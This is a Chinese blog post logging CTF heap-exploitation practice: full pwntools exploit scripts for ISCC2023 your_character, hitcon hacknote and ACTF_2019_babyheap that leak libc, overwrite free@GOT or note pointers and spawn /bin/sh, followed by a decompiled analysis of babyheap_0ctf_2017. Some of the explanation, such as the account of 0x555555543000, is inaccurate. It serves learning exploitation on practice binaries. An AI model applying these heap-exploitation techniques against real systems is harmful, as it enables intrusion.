<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="文明其思想，野蛮其体魄。">
    <meta name="author" content="二十八华生">
    
    <title>
        
            Heap刷题记录 |
        
        二十八华生的博客
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/bitbug_favicon.6goqr5bioz9c.webp">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/fontawesome/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/fontawesome/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/fontawesome/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/fontawesome/css/brands.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"c2yb8er.cn","root":"/","language":"zh-CN","path":"search.xml"};
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true},"style":{"primary_color":"#0066cc","logo":"https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/WanYe.2i8xng3vmthc.webp","favicon":"https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/bitbug_favicon.6goqr5bioz9c.webp","avatar":"https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/WanYe.2i8xng3vmthc.webp","font_size":"15.2px","hover":{"shadow":true,"scale":false},"first_screen":{"enable":true,"header_transparent":true,"background_img":"/images/bg.svg","description":"文明其思想，||野蛮其体魄。","font_color":null,"hitokoto":false},"scroll":{"progress_bar":true,"percent":false}},"local_search":{"enable":true,"preload":true},"code_copy":{},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"side_tools":{},"pjax":{"enable":true},"lazyload":{"enable":true},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.7"},"waline":{"server_url":null,"reaction":false,"version":2}},"post":{"author_label":{"enable":false,"auto":true,"custom_label_list":[]},"word_count":{"enable":true,"wordcount":true,"min2read":true},"img_align":"left","copyright_info":true},"version":"3.5.2"};
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"};
  </script>
<meta name="generator" content="Hexo 5.4.2"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/WanYe.2i8xng3vmthc.webp">
                </a>
            
            <a class="logo-title" href="/">
               二十八华生的博客
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                分类
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            <div class="article-title">
                <span class="title-hover-animation">Heap刷题记录</span>
            </div>

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/WanYe.2i8xng3vmthc.webp">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">二十八华生</span>
                            
                        </div>
                        <div class="meta-info">
                            
<div class="article-meta-info">
    <span class="article-date article-meta-item">
        
            <i class="fa-regular fa-calendar-plus"></i>&nbsp;
        
        <span class="pc">2023-05-02 21:18:55</span>
        <span class="mobile">2023-05-02 21:18</span>
    </span>
    
        <span class="article-update-date article-meta-item">
        <i class="fas fa-file-pen"></i>&nbsp;
        <span class="pc">2023-07-08 01:20:29</span>
    </span>
    
    
        <span class="article-categories article-meta-item">
            <i class="fas fa-folder"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/PWN/">PWN</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/Heap/">Heap</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i>&nbsp;<span>6.8k 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fas fa-clock"></i>&nbsp;<span>29 分钟</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content keep-markdown-body">
                <blockquote>
<p>Heap! Heap! Heap!</p>
</blockquote>
<h1 id="Off-by-one"><a href="#Off-by-one" class="headerlink" title="Off-by-one"></a>Off-by-one</h1><h2 id="0x0"><a href="#0x0" class="headerlink" title="0x0"></a>0x0</h2><h2 id="0x1-ISCC2023-your-character"><a href="#0x1-ISCC2023-your-character" class="headerlink" title="0x1.ISCC2023_your_character"></a>0x1.ISCC2023_your_character</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"># c = process(&#x27;/home/c2yb8er/下载/ISCC2023/your_character/your_character&#x27;)</span><br><span class="line">c = remote(&quot;59.110.164.72&quot;,10003)</span><br><span class="line">elf = ELF(&#x27;/home/c2yb8er/下载/ISCC2023/your_character/your_character&#x27;)</span><br><span class="line">libc = ELF(&#x27;/home/c2yb8er/下载/ISCC2023/your_character/libc-2.23.so&#x27;)</span><br><span class="line">context.terminal = [&#x27;gnome-terminal&#x27;, &#x27;-x&#x27;, &#x27;sh&#x27;, &#x27;-c&#x27;]</span><br><span class="line">context.arch = &#x27;amd64&#x27;</span><br><span class="line">context.log_level = &#x27;debug&#x27;</span><br><span class="line"># 比赛没有做过堆题，一开始以为这道题的考点是UAF(没有仔细看free后将悬挂指针清零了)，没想到是Off-by-one + chunk overlap</span><br><span class="line">def skill_create(size,content):</span><br><span class="line">    c.recvuntil(b&#x27;Your choice :&#x27;)</span><br><span class="line">    c.send(b&#x27;1&#x27;)</span><br><span class="line">    c.recvuntil(b&#x27;Damage of skill : &#x27;)</span><br><span class="line">    c.send(str(size))</span><br><span class="line">    c.recvuntil(b&#x27;introduction of skill:&#x27;)</span><br><span class="line">    c.send(content)</span><br><span class="line"></span><br><span class="line">def skill_delete(index):</span><br><span class="line">    c.recvuntil(b&#x27;Your choice :&#x27;)    </span><br><span class="line">    c.send(b&#x27;5&#x27;)    </span><br><span class="line">    c.recvuntil(b&#x27;Index :&#x27;)    </span><br><span class="line">    c.send(str(index))  </span><br><span class="line"></span><br><span class="line">def  skill_show(index):</span><br><span class="line">    c.recvuntil(b&#x27;Your choice :&#x27;)    </span><br><span class="line">    c.send(b&#x27;4&#x27;)    </span><br><span class="line">    c.recvuntil(b&#x27;Index :&#x27;)    </span><br><span class="line">    c.send(str(index))  </span><br><span class="line"></span><br><span class="line">def  skill_edit(index,content):</span><br><span class="line">    c.recvuntil(b&#x27;Your choice :&#x27;)    </span><br><span class="line">    c.send(b&#x27;3&#x27;)    </span><br><span class="line">    c.recvuntil(b&#x27;Index :&#x27;)    </span><br><span class="line">    c.send(str(index))</span><br><span class="line">    c.recvuntil(b&#x27;introduction of skill : &#x27;)</span><br><span class="line">    c.send(content)</span><br><span class="line"></span><br><span class="line">c.recvuntil(b&#x27;Your choice :&#x27;)</span><br><span class="line">c.send(b&#x27;1&#x27;)  </span><br><span class="line"></span><br><span class="line">skill_create(0x18,b&#x27;aaaa&#x27;)</span><br><span class="line">skill_create(0x10,b&#x27;bbbb&#x27;)</span><br><span class="line"></span><br><span class="line">payload = b&quot;/bin/sh\x00&quot; + b&quot;a&quot; * 0x10 + b&quot;\x41&quot;</span><br><span class="line">skill_edit(0,payload)</span><br><span class="line"></span><br><span class="line">skill_delete(1)</span><br><span class="line"></span><br><span class="line">skill_create(0x30, p64(0) * 3 + p64(0x21) + p64(0x30) + p64(elf.got[&#x27;free&#x27;]))</span><br><span class="line">skill_show(1)</span><br><span class="line"></span><br><span class="line">c.recvuntil(b&#x27;Introduction : &#x27;)</span><br><span class="line">free_addr = c.recv(6).ljust(8,b&#x27;\x00&#x27;)</span><br><span class="line">free_addr = u64(free_addr)</span><br><span class="line">loghex(free_addr,&#x27;THE LEAK ADDR : &#x27;)</span><br><span class="line"></span><br><span class="line">libcbase = free_addr - libc.sym[&#x27;free&#x27;]</span><br><span class="line">system_addr = libcbase + libc.sym[&#x27;system&#x27;]</span><br><span class="line">bin_sh = libcbase + next(libc.search(b&#x27;/bin/sh&#x27;))</span><br><span class="line"></span><br><span class="line">skill_edit(1,p64(system_addr))</span><br><span class="line">skill_delete(0)</span><br><span class="line"></span><br><span class="line">c.interactive()</span><br></pre></td></tr></table></figure>



<h1 id="UAF"><a href="#UAF" class="headerlink" title="UAF:"></a>UAF:</h1><h2 id="0x0-hitcon-training-hacknote"><a href="#0x0-hitcon-training-hacknote" class="headerlink" title="0x0:hitcon-training-hacknote"></a>0x0:hitcon-training-hacknote</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">c = process(&#x27;/home/c2yb8er/下载/Heap/UAF/UAF32&#x27;)</span><br><span class="line"># c = remote(&#x27;node4.buuoj.cn&#x27;,29877)</span><br><span class="line">elf = ELF(&#x27;/home/c2yb8er/下载/Heap/UAF/UAF32&#x27;)</span><br><span class="line"># libc = ELF(&#x27;/home/c2yb8er/Binary/libcs/18X64&#x27;)</span><br><span class="line">libc = ELF(&#x27;/lib/i386-linux-gnu/libc.so.6&#x27;)</span><br><span class="line"></span><br><span class="line">context.terminal = [&#x27;gnome-terminal&#x27;, &#x27;-x&#x27;, &#x27;sh&#x27;, &#x27;-c&#x27;]</span><br><span class="line"></span><br><span class="line">def addnote(size,content):</span><br><span class="line">    c.recvuntil(b&#x27;Your choice :&#x27;)</span><br><span class="line">    c.sendline(b&#x27;1&#x27;)</span><br><span class="line">    c.recvuntil(b&#x27;Note size :&#x27;)</span><br><span class="line">    c.sendline(str(size))</span><br><span class="line">    c.recvuntil(b&#x27;Content :&#x27;)</span><br><span class="line">    c.sendline(content)</span><br><span class="line"></span><br><span class="line">def delnote(index):</span><br><span class="line">    c.recvuntil(b&#x27;Your choice :&#x27;)</span><br><span class="line">    c.sendline(b&#x27;2&#x27;)</span><br><span class="line">    c.recvuntil(b&#x27;Index :&#x27;)</span><br><span class="line">    c.send(str(index))</span><br><span class="line"></span><br><span class="line">def printnote(index):</span><br><span class="line">    c.recvuntil(b&#x27;Your choice :&#x27;)</span><br><span class="line">    c.sendline(b&#x27;3&#x27;)</span><br><span class="line">    c.recvuntil(b&#x27;Index :&#x27;)</span><br><span class="line">    c.send(str(index))</span><br><span class="line"></span><br><span class="line">context.arch = &#x27;i386&#x27;</span><br><span class="line"># context.log_level = &#x27;debug&#x27;</span><br><span class="line"></span><br><span class="line">magic = 0x08048986</span><br><span class="line"></span><br><span class="line">addnote(24,b&quot;AAAAAAAA&quot;)</span><br><span class="line">addnote(24,b&quot;aaaaaaaa&quot;)</span><br><span class="line"></span><br><span class="line">gdb.attach(c)</span><br><span class="line">pause()</span><br><span class="line">delnote(0)</span><br><span class="line">delnote(1)</span><br><span class="line"></span><br><span class="line">addnote(8,p32(magic))</span><br><span class="line">printnote(0)</span><br><span class="line"></span><br><span class="line">c.interactive()</span><br></pre></td></tr></table></figure>



<h2 id="0x1-ACTF-2019-babyheap"><a href="#0x1-ACTF-2019-babyheap" class="headerlink" title="0x1:ACTF_2019_babyheap"></a>0x1:ACTF_2019_babyheap</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"># c = process(&#x27;/home/c2yb8er/下载/Heap/UAF/ACTF_2019_babyheap&#x27;)</span><br><span class="line">c = remote(&#x27;node4.buuoj.cn&#x27;,29991)</span><br><span class="line">elf = ELF(&#x27;/home/c2yb8er/下载/Heap/UAF/ACTF_2019_babyheap&#x27;)</span><br><span class="line"># libc = ELF(&#x27;/home/c2yb8er/Binary/libcs/18X64&#x27;)</span><br><span class="line">libc = ELF(&#x27;/lib/i386-linux-gnu/libc.so.6&#x27;)</span><br><span class="line"></span><br><span class="line">context.log_level = &#x27;debug&#x27;</span><br><span class="line">context.terminal = [&#x27;gnome-terminal&#x27;, &#x27;-x&#x27;, &#x27;sh&#x27;, &#x27;-c&#x27;]</span><br><span class="line"></span><br><span class="line">def addnote(size,content):</span><br><span class="line">    c.recvuntil(b&#x27;Your choice: &#x27;)</span><br><span class="line">    c.send(b&#x27;1&#x27;)</span><br><span class="line">    c.recvuntil(b&#x27;Please input size:&#x27;)</span><br><span class="line">    c.send(str(size))</span><br><span class="line">    c.recvuntil(b&#x27;Please input content:&#x27;)</span><br><span class="line">    c.send(content)</span><br><span class="line"></span><br><span class="line">def delnote(index):</span><br><span class="line">    c.recvuntil(b&#x27;Your choice: &#x27;)</span><br><span class="line">    c.send(b&#x27;2&#x27;)</span><br><span class="line">    c.recvuntil(b&#x27;Please input list index:&#x27;)</span><br><span class="line">    c.send(str(index))</span><br><span class="line"></span><br><span class="line">def printnote(index):</span><br><span class="line">    c.recvuntil(b&#x27;Your choice: &#x27;)</span><br><span class="line">    c.send(b&#x27;3&#x27;)</span><br><span class="line">    c.recvuntil(b&#x27;Please input list index:&#x27;)</span><br><span class="line">    c.send(str(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># 0x0000000000602010 : /bin/sh</span><br><span class="line">bin_sh = 0x602010</span><br><span class="line"></span><br><span class="line">addnote(36,b&#x27;AAAAAAAA&#x27;)</span><br><span class="line">addnote(36,b&#x27;aaaaaaaa&#x27;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># gdb.attach(c)</span><br><span class="line"># pause()</span><br><span class="line">delnote(0)</span><br><span class="line">delnote(1)</span><br><span class="line"></span><br><span class="line">addnote(0x10,p64(bin_sh)+p64(elf.symbols[&#x27;system&#x27;]))</span><br><span class="line"></span><br><span class="line">printnote(0)</span><br><span class="line"></span><br><span class="line">c.interactive()</span><br></pre></td></tr></table></figure>





<h1 id="Fastbin-Attack"><a href="#Fastbin-Attack" class="headerlink" title="Fastbin Attack"></a>Fastbin Attack</h1><h2 id="0x0-babyheap-0ctf-2017"><a href="#0x0-babyheap-0ctf-2017" class="headerlink" title="0x0:babyheap_0ctf_2017"></a>0x0:babyheap_0ctf_2017</h2><h3 id="0-我决定下工夫来静态分析一波！"><a href="#0-我决定下工夫来静态分析一波！" class="headerlink" title="0.我决定下工夫来静态分析一波！"></a>0.我决定下工夫来静态分析一波！</h3><h4 id="main函数"><a href="#main函数" class="headerlink" title="main函数"></a>main函数</h4><p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230505/c2yb8erimage.4fl3g6xblbc0.png"></p>
<h4 id="Init函数"><a href="#Init函数" class="headerlink" title="Init函数"></a>Init函数</h4><p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230505/c2yb8erimage.2pb62wxp8g80.png"></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">  fd = open(<span class="string">&quot;/dev/urandom&quot;</span>, <span class="number">0</span>);</span><br><span class="line"><span class="comment">// /dev/urandom 是 Linux 系统中的一种随机数生成设备，可以用来获取安全随机数。在此代码中，通过打开该设备文件，可以获取到对应的文件描述符，从而可以使用系统调用 read() 等函数从该设备文件中读取随机数。</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> ( fd &lt; <span class="number">0</span> || read(fd, buf, <span class="number">0x10</span>uLL) != <span class="number">16</span> )</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">  close(fd);</span><br><span class="line">  addr = (<span class="type">char</span> *)((buf[<span class="number">0</span>] % <span class="number">0x555555543000</span>uLL + <span class="number">0x10000</span>) &amp; <span class="number">0xFFFFFFFFFFFFF000</span>LL);</span><br><span class="line">  v3 = (buf[<span class="number">1</span>] % <span class="number">0xE80</span>uLL) &amp; <span class="number">0xFFFFFFFFFFFFFFF0</span>LL;</span><br><span class="line">  <span class="keyword">if</span> ( mmap(addr, <span class="number">0x1000</span>uLL, <span class="number">3</span>, <span class="number">34</span>, <span class="number">-1</span>, <span class="number">0LL</span>) != addr )</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">  <span class="keyword">return</span> &amp;addr[v3];</span><br></pre></td></tr></table></figure>

<p>​    我们逐条剖析：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">addr = (<span class="type">char</span> *)((buf[<span class="number">0</span>] % <span class="number">0x555555543000</span>uLL + <span class="number">0x10000</span>) &amp; <span class="number">0xFFFFFFFFFFFFF000</span>LL);</span><br></pre></td></tr></table></figure>

<p>​    在这段代码中，<code>addr</code> 是一个 <code>char*</code> 类型的指针变量，用于保存计算得到的内存地址。<br>​    在这个特定的语句中，<code>(buf[0] % 0x555555543000uLL + 0x10000)</code> 这个表达式计算出一个无符号长整型数值，它表示的是一个相对于程序基址的偏移量。程序基址是程序在内存中加载时所在的基地址，通常是一个固定的值，用于计算程序中的全局变量和函数的地址。在这个代码中，通过计算得到的偏移量是以程序基址为基准的。<br>​    接下来的 <code>&amp; 0xFFFFFFFFFFFFF000LL</code> 操作对偏移量进行了一个按位与（AND）操作，并且用了一个掩码值，将偏移量的低 12 位（即 0x1000）清零。这个操作实际上是为了将偏移量<mark>对齐</mark>到一个 4KB 的页面边界上，以便后续的内存操作更高效地进行。<br>​    最后，整个表达式的结果被强制转换为一个 <code>char*</code> 类型的指针，并赋值给 <code>addr</code> 变量。</p>
<blockquote>
<p>为什么是% 0x555555543000uLL ？</p>
<p>​    –<code>0x555555543000</code> 是一个用来作为程序基址的常数，它的选择是因为在 Linux x86-64 系统下，用户空间程序的地址范围是从 0x0000000000000000 到 0x7fffffffffffffff，其中从 0x0000000000000000 到 0x0000555555555540 之间的地址空间是由程序本身使用的，而从 0x0000555555555540 开始的地址空间是留给系统库和其他用户空间程序使用的。因此，在这个代码中，使用 <code>0x555555543000</code> 这个值来作为程序基址可以避免与系统库和其他程序的地址空间冲突。并且，在计算内存地址时，使用取模运算 <code>%</code> 可以将偏移量限制在程序地址空间内。</p>
<p>为什么是% 0xE80uLL ？</p>
<p>​    –用来限制偏移量的范围</p>
</blockquote>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mmap(addr, <span class="number">0x1000</span>uLL, <span class="number">3</span>, <span class="number">34</span>, <span class="number">-1</span>, <span class="number">0LL</span>)</span><br></pre></td></tr></table></figure>

<p>​    简单来说就是从addr地址起，分配一页(0x1000字节)<mark>可读可写可执行</mark>的区域。</p>
<h4 id="SizeChoice函数"><a href="#SizeChoice函数" class="headerlink" title="SizeChoice函数"></a>SizeChoice函数</h4><p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230505/c2yb8erimage.2czzd8e23uhw.png"></p>
<h4 id="sub-123D函数–-gt-read-one-by-one函数"><a href="#sub-123D函数–-gt-read-one-by-one函数" class="headerlink" title="sub_123D函数–&gt;read_one_by_one函数"></a>sub_123D函数–&gt;read_one_by_one函数</h4><p><code>SizeChoice</code>函数中还有一个名为<code>sub_123D</code>的函数，我们点开看看：</p>
<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230505/c2yb8erimage.4i4gxo2mmtg0.png"></p>
<p>​    定义了三个局部变量：v3用于存储循环次数，buf用于存储读取到的字符，v6用于存储read函数的返回值。<br>​    进入循环后，每次循环通过read函数从标准输入中读取一个字符，并判断该字符是否为换行符（’\n’）。如果读取到的字符为换行符，则跳出循环。如果读取到的字符不为换行符，则将该字符存储到a1（也就是ptr）指向的内存中，并将v5加1表示已经读取的字节数增加了1。如果read函数返回值小于等于0，表示出现了错误，此时通过<code>*_errno_location()</code>函数获取错误码并判断是否为<code>EAGAIN</code>或<code>EINTR</code>，如果不是则跳出循环。<br>​    最后，将a1指向的内存中第v5个字节设置为’\0’表示字符串结束，并返回实际读取的字节数v5。</p>
<p>​    <strong>一言概之，这个函数就是安全地向ptr中写入8个字节并且加上换行符.</strong></p>
<h4 id="Allocate函数"><a href="#Allocate函数" class="headerlink" title="Allocate函数"></a>Allocate函数</h4><p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230505/c2yb8erimage.3o2n9qvb9l00.png"></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// _DWORD* 是一个指向 DWORD 类型的指针，其中 DWORD 是一个 32 位无符号整数类型</span></span><br><span class="line"><span class="comment">// _QWORD * 表示指向 unsigned long long 类型的指针，即 64 位整数类型的指针。</span></span><br><span class="line">v3 = <span class="built_in">calloc</span>(v2, <span class="number">1uLL</span>);</span><br></pre></td></tr></table></figure>

<p>​    <code>    calloc()</code> 函数是 C 语言标准库中的动态内存分配函数之一，用于在堆上分配一块大小为 <code>v2</code> 字节（即 <code>v2</code> 个字节）的内存，并将这块内存的每个字节都初始化为 0。函数的定义如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> *<span class="title function_">calloc</span><span class="params">(<span class="type">size_t</span> nmemb, <span class="type">size_t</span> size)</span>;</span><br></pre></td></tr></table></figure>

<p>​    其中，<code>nmemb</code> 表示需要分配的元素个数，<code>size</code> 表示每个元素的大小，函数返回一个指向新分配内存的指针，如果分配失败则返回 <code>NULL</code>。</p>
<p>​    在上述代码中，<code>v2</code> 代表需要分配的字节数，<code>1uLL</code> 表示每个元素的大小为 1 字节，所以 <code>calloc()</code> 函数分配了 <code>v2</code> 个字节的内存，并将这些字节全部初始化为 0。最终将分配得到的指针存储在 <code>v3</code> 变量中。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">*(_DWORD *)(<span class="number">0x18</span>LL * i + a1) = <span class="number">1</span>;</span><br><span class="line">*(_QWORD *)(a1 + <span class="number">0x18</span>LL * i + <span class="number">8</span>) = v2;</span><br><span class="line">*(_QWORD *)(a1 + <span class="number">0x18</span>LL * i + <span class="number">16</span>) = v3;</span><br></pre></td></tr></table></figure>

<ul>
<li>第一行将指定索引对应的内存块<mark>标记</mark>为已分配，以示该内存块已被占用。</li>
<li>第二行将该<mark>内存块的大小</mark>存储到指定索引对应的位置中，方便释放时使用。</li>
<li>第三行将该<mark>内存块的指针</mark>存储到指定索引对应的位置中，方便释放时使用。</li>
</ul>
<p><strong>注意，最多只能分配16块内存块。</strong></p>
<h4 id="Fill函数"><a href="#Fill函数" class="headerlink" title="Fill函数"></a>Fill函数</h4><p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230505/c2yb8erimage.47znt11n1ho0.png"></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">result = *(<span class="type">unsigned</span> <span class="type">int</span> *)(<span class="number">24LL</span> * (<span class="type">int</span>)result + a1);</span><br><span class="line"><span class="keyword">if</span> ( (_DWORD)result == <span class="number">1</span> )</span><br></pre></td></tr></table></figure>

<p>​    还记得我们刚刚Allocate函数中的标记位置吗？这里就是检测我们要操作的堆块是否是已经被分配了的。</p>
